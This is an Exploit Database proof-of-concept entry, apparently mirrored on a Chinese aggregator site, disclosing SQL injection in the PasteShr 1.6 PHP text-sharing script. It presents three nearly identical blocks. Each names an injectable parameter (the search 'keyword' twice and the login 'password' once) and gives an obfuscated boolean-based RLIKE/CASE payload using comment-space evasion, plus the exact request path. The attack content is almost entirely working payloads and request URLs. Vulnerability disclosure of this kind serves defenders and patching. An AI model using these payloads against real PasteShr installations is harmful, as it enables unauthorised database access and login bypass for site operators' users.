PasteShr 1.6 – Multiple SQL Injection

• Exploit Database
• 14 阅读

• 作者： Mehmet EMIROGLU
  日期： 2019-05-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46847/

• ===========================================================================================
  # Exploit Title: PasteShr - SQL İnj.
  # Dork: N/A
  # Date: 14-05-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage:
  https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
  # Software Link:
  https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
  # Version: v1.6
  # Category: Webapps
  # Tested on: Wamp64, Windows
  # CVE: N/A
  # Software Description: Pasteshr is a script which allows you to store any
  text online for easy sharing.
  The idea behind the script is to make it more convenient for people to
  share large amounts of text online.
  ===========================================================================================
  # POC - SQLi
  # Parameters : keyword
  # Attack Pattern :
  %27/**/RLIKE/**/(case/**/when/**//**/9494586=9494586/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
  # GET Method : http://localhost/pasthr/public/search?keyword=4137548[SQL
  Inject Here]
  ===========================================================================================
  ###########################################################################################
  ===========================================================================================
  # Exploit Title: PasteShr - SQL İnj.
  # Dork: N/A
  # Date: 14-05-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage:
  https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
  # Software Link:
  https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
  # Version: v1.6
  # Category: Webapps
  # Tested on: Wamp64, Windows
  # CVE: N/A
  # Software Description: Pasteshr is a script which allows you to store any
  text online for easy sharing.
  The idea behind the script is to make it more convenient for people to
  share large amounts of text online.
  ===========================================================================================
  # POC - SQLi
  # Parameters : password
  # Attack Pattern :
  /**/RLIKE/**/(case/**/when/**//**/6787556=6787556/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)
  # POST Method :
  http://localhost/pasthr/public/login?_token=1lkW1Z61RZlmfYB0Ju07cfekR6UvsqaFAfeZfi2c&email=2270391&password=6195098[SQL
  Inject Here]
  ===========================================================================================
  ###########################################################################################
  ===========================================================================================
  # Exploit Title: PasteShr - SQL İnj.
  # Dork: N/A
  # Date: 14-05-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage:
  https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
  # Software Link:
  https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
  # Version: v1.6
  # Category: Webapps
  # Tested on: Wamp64, Windows
  # CVE: N/A
  # Software Description: Pasteshr is a script which allows you to store any
  text online for easy sharing.
  The idea behind the script is to make it more convenient for people to
  share large amounts of text online.
  ===========================================================================================
  # POC - SQLi
  # Parameters : keyword
  # Attack Pattern :
  %27/**/RLIKE/**/(case/**/when/**//**/8266715=8266715/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
  # POST Method :
  http://localhost/pasthr/server.php/search?keyword=1901418[SQL Inject Here]
  ===========================================================================================